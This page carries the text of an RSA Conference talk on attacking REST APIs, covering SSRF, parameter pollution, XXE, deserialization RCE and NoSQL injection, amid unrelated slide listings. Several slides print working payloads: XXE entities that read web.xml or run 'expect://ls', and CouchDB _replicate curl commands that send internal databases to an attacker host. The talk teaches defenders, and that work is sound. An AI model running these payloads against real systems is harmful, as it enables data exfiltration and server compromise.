Creating a graph based security organisation - Apr 2019 (OWASP London chapter...
 
Open security summit 2019 owasp london 25th feb
Open security summit 2019 owasp london 25th febOpen security summit 2019 owasp london 25th feb
Open security summit 2019 owasp london 25th feb
 
Owasp summit 2019 - OWASP London 25th feb
Owasp summit 2019 - OWASP London 25th febOwasp summit 2019 - OWASP London 25th feb
Owasp summit 2019 - OWASP London 25th feb
 

Último

Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Último (20)

Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

Asec r01-resting-on-your-laurels-will-get-you-pwned

  • 1. SESSION ID: RESTing on Your Laurels Will Get You Pwnd ASEC-R01 Abraham Kang Director Engineering Samsung @KangAbraham Alvaro Muñoz Sanchez Senior Security Researcher HP Fortify @pwntester Dinis Cruz (in absentia) Principal Security Engineer Security Innovation @DinisCruz
  • 2. #RSAC Goals and Main Point  Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.  Remember that a REST API is nothing more than a web application which follows a structured set of rules.  So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc.  We are going to show you how remote code execution and data filtration manifest themselves in REST APIs.
  • 3. #RSAC REST History  Introduced to the world in a PHD dissertation by Roy Fielding in 2000.  Promoted the idea of using HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request.  GET http://svr.com/customers/123  POST http://svr.com/customers/123
  • 4. #RSAC Causes of REST Vulnerabilities  Location in the trusted network of your data center  SSRF (Server Side Request Forgery) to Internal REST APIs  URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)  Self describing nature  Inbred Architecture  Incorrect assumptions of application behavior  Input types and interfaces  Extensions in REST frameworks that enhance development of REST functionality at the expense of security
  • 5. #RSAC Attacking An Internal Network (REST style)  Find an HTTP REST proxy w/ vulns  Figure out which REST based systems are running on the internal network  Exfiltrate data from the REST interface of the backend system or GET RCE on internal REST API  What backend systems have a REST API:  ODATA in MS SQL Server  Beehive and OAE RESTful API  Neo4j, Mongo, Couch, Cassandra, Hbase, your company, and many more X Non-compromised machine Y Affected machine SAPRESTAPI SAP AS5 … PubRESTAPI Mongo Couch Neo4j Cassan HBase …REST API REST API REST API REST API REST API REST API REST EAI EII ESB
  • 6. #RSAC SSRF (Server Side Request Forgery) to Internal REST APIs  Public REST Services attack Internal REST services (in the DMZ)  Enablers: RFI (Remote File Inclusion) through PHP include(), REST framework specific proxy (RESTlet Redirector), XXE, WS-* protocols, etc.  Causes: Concatenation in URLs built to connect to internal REST services or arbitrary xml loaded by server  Many internal REST APIs are using basic auth over SSL. So you can use the same attacks above to find the basic auth credentials on the file system and embed them in the URL:  http://user:password@internalSvr.com/xxx...
  • 7. #RSAC What to Look For  new URL (“http://yourSvr.com/value” + var);  new Redirector(getContext(), urlFromCookie, MODE_SERVER_OUTBOUND );  HttpGet(“http://yourSvr.com/value” + var);  HttpPost(“http://yourSvr.com/value” + var);  restTemplate.postForObject( ”http://localhost:8080/Rest/user/” + var, request, User.class );  ...
  • 8. #RSAC HPP (HTTP Parameter Pollution)  HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and Luca Carettoni in 2009. It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs. Typically attacks utilized the “&” character to fool backend services in accepting attacker controlled request parameters.
  • 9. #RSAC Extended HPPP (HTTP Path & Parameter Pollution)  Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request.  “#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection  “../” can be used to change the overall semantics of the REST request in path based APIs (vs query parameter based)  “;” can be used to add matrix parameters to the URL at different path segments  The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)  Special framework specific query parameters allow enhanced access to backend data through REST API. The “qt” parameter in Apache Solr  JSON Injection is also used to provide the necessary input to the application receiver.
  • 10. #RSAC Faking Out Security Filters (Scenario) User • Hacker Security Filter/Servlet • Allows GET requests for public but POST, PUT and DELETE for only admin users • /creditInfo REST Service • Provides credit info
  • 11. #RSAC Faking Out Security Filters (Bypass) User • Hacker • “_method” parameter • “X-HTTP-Method- Override” header Security Filter/Servlet • Looks like a GET but turns into PUT, POST, or DELETE • creditInfo?_method=PUT REST Service • Updates credit info
  • 12. #RSAC Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/client/” + entity + “?id=“ + id ); Change it to a POST to the following URL http://svr.com:5984/admin User App Server Calls Backend REST Service
  • 13. #RSAC Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/client/” + “../admin” + “?id=“ + “1&_method=POST” ); Change it to a POST to the following URL http://svr.com:5984/admin User App Server Calls Backend REST Service
  • 14. #RSAC REST is Self Describing and Predictable  What URL would you first try when gathering information about a REST API and the system that backs it?
  • 15. #RSAC REST is Self Describing  What URL would you first try when gathering information about a REST API and the system that backs it?  http://host:port/  Compare this to:  Select * from all_tables (in Oracle)  sp_msforeachdb 'select "?" AS db, * from [?].sys.tables' (SQL Server)  SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('columnA','ColumnB') AND TABLE_SCHEMA='YourDatabase'; (My SQL)  Etc.
  • 16. #RSAC Especially for NoSQL REST APIs  All of the following DBs have REST APIs which closely follow their database object structures  HBase  Couch DB  Mongo DB  Cassandra.io  Neo4j
  • 17. #RSAC HBase REST API  Find all the tables in the Hbase Cluster:  http://host:9000/  Find the running HBase version:  http://host:9000/version  Find the nodes in the HBase Cluster:  http://host:9000/status/cluster  Find a description of a particular table’s schema(pick one from the prior link):  http://host:port/profile/schema
  • 18. #RSAC Inbred Architecture  Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs.  Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs.
  • 19. #RSAC Incorrect assumptions of REST application behavior  People still thinking web when developing public REST APIs:  http://www.svr.com/view_profile?id=12345  http://www.srv.com/credit_report?user_id=123-45-6789  http://www.abc.com/find_friends?phone_nums=410-555-1212,310-123-4567  REST provides for dynamic URLs and dynamic resource allocation
  • 20. #RSAC REST provides for dynamic URLs and dynamic resource allocation Example Case Study  You have an Mongo DB REST API which exposes two databases which can only be accessed at /realtime/* and /predictive/*  There are two static ACLs which protect all access to each of these databases <web-resource-name>Realtime User</web-resource-name> <url-pattern>/realtime/*</url-pattern> <web-resource-name>Predictive Analysis User</web-resource-name> <url-pattern>/predicitive/*</url-pattern> Can anyone see the problem? You should be able to own the server with as little disruption to the existing databases.
  • 21. #RSAC Example Case Study Exploit  The problem is not in the two databases. The problem is that you are working with a REST API and resources are dynamic.  So POST to the following url to create a new database called test which is accessible at “/test”: POST http://svr.com:27080/test  Then POST the following: POST http://svr.com:27080/test/_cmd  With the following body: cmd={…, “$reduce”:”function (obj, prev) { malicious_code() }” …
  • 22. #RSAC REST Input Types and Interfaces  Does anyone know what the main input types are to REST interfaces?
  • 23. #RSAC REST Input Types and Interfaces  Does anyone know what the main input types are to REST interfaces?  XML and JSON
  • 24. #RSAC XML Related Vulnerabilities  When you think of XML--what vulnerabilities come to mind?
  • 25. #RSAC XML Related Vulnerabilities  When you think of XML--what vulnerabilities come to mind?  XXE (eXternal XML Entity Injection) / SSRF (Server Side Request Forgery)  XSLT Injection  XDOS  XML Injection  XML Serialization
  • 26. #RSAC XXE (File Disclosure and Port Scanning)  Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.  XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘../WEB-INF/web.xml’> ]> <Customer> <name>&y;</name> </Customer> *See Attacking <?xml?> processing by Nicolas Gregoire (Agarri) and XML Out-of-Band Data Retrieval by Timur Yunusov and Alexey Osipov
  • 27. #RSAC XXE (Remote Code Execution)  Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.  XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘expect://ls’> ]> <Customer> <name>&y;</name> </Customer> *See XXE: advanced exploitation, d0znpp, ONSEC *expect protocol requires pexpect module to be loaded in PHP *joernchen has another example at https://gist.github.com/joernchen/3623896
  • 28. #RSAC XXE Today  At one time most REST frameworks were vulnerable to XXE  But newer versions have patched this vulnerability  XXE on SpringMVC last summer  XEE on Restlet last month  XXE on Jboss Seam recently  …
  • 29. #RSAC XML Serialization Vulnerabilities  Every REST API allows the raw input of XML to be converted to native objects. This deserialization process can be used to execute arbitrary code on the REST server.
  • 30. #RSAC Understanding XML Serialization  Mainly Three Mechanisms Used by Server Logic  Server looks where to go before going  Create an object based on the target type defined in the application then assign values from the xml to that instance  Server asks user where to go  Create and object based on a user specified type in the provided XML then assign values (to public or private fields) from the xml to that instance, finally cast the created object to the target type defined in the application  Server asks user where to go and what to do  Create and object based on a user specified type in the provided XML then assign values from the xml to that instance, allow object assignments and invoke arbitrary methods on the newly created instance, finally cast the created object to the target type defined in the application
  • 31. #RSAC Vulnerable XML Serialization APIs  In our research we found one API that “asks the user where to go”:  XStream  More limited  Cannot invoke methods  Relies on existing APIs to trigger the code execution  And another that “asks the user where to go and what to do”:  XMLDecoder  Unrestricted  Execute arbitrary methods on newly created objects which are defined in the input  Near Turing complete
  • 32. #RSAC XML Serialization RCE – Restlet/XMLDecoder
  • 33. #RSAC XML Serialization RCE – Restlet/XMLDecoder
  • 34. #RSAC XML Serialization RCE – Restlet/XMLDecoder Demo
  • 35. #RSAC XML Serialization RCE – SpringMVC/XStream  XStream is not exactly a marshaller as it allows full object serialization  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized  One interesting class: DynamicProxyConverter
  • 36. #RSAC What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class field1 field2 method1 method2 method3
  • 37. #RSAC What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3 Interface method1 method2
  • 38. #RSAC Custom code What is a DynamicProxy again?  A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3 Interface method1 method2 Proxy
  • 39. #RSAC Turning a Feature into a Bug  Attacker’s plan: • Find out what Class the XML will be deserialized to • Create a proxy for that Class the WebService is waiting for • Intercept/hook any call to any method in the interface • Replace the original call with the malicious payload • Send the serialized version of the proxy • Cross-fingers • Profit
  • 40. #RSAC The wall is the SERVER …… and believe it or not this man is a dynamic proxy!
  • 43. #RSAC XML Serialization RCE – SpringMVC/XStream Demo
  • 44. #RSAC JSON Serialization  ODATA  … { “type” : “namespace.Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  Ruby on Rails  { “json_class” : “package::Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  JSON.NET  { “$type” : “namespace.Class”, “arbtraryAttr” : “attackerProvidedValue”, … }  Other frameworks work similarly
  • 45. #RSAC Extensions in REST frameworks that enhance development of REST functionality at the expense of security  Turns remote code execution and data exfiltration from a security vulnerability into a feature.  In some cases it is subtle:  Passing in partial script blocks used in evaluating the processing of nodes.  Passing in JavaScript functions which are used in map-reduce processes.  In others it is more obvious:  Passing in a complete Groovy script which is executed as a part of the request on the server. Gremlin Plug-in for Neo4j.  Passing in the source and target URLs for data replication
  • 46. #RSAC Rest Extensions Data Exfiltration Example (Couch DB)  curl –vX POST http://internalSrv.com:5984/_replicate –d ‘{“source”:”db_name”, “target”:”http://attackerSvr.com:5984/corpData”}’ –H “Content-Type: application/json”  curl –vX POST http://srv.com:5984/_replicate –d ‘{“source”:”http://anotherInternalSvr.com:5984/db”, “target”:”http://attackerSvr.com:5984/corpData”}’ –H “Content-Type: application/json”
  • 47. #RSAC Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL urlPost = new URL(“http://svr.com:5984/customers/” + id); String name = request.getParameter(“name”); String json = “{”fullName”:”” + name + “”}”; How can you exfiltrate the data given the above?
  • 48. #RSAC Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL url = new URL(“http://svr.com:5984/customers/../_replicate”); String name = request.getParameter(“name”); String json = “{”fullName”:”X”, ”source”:”customers”, ”target”:”http://attackerSvr.com:5984/corpData”}”; Attacker provides: id = “../_replicate” name = ‘X”, “source”:”customers”, “target”:”http://attackerSvr.com:5984/corpData’
  • 49. #RSAC Conclusion  Publically exposed and/or internal REST APIs ease integration but can be fraught with risk.  This talk gave you exposure to some of the common problems in REST based applications.
  • 50. #RSAC Questions/Call To Action ? Abe: @KangAbraham Alvaro: @pwntester Dinis: @DinisCruz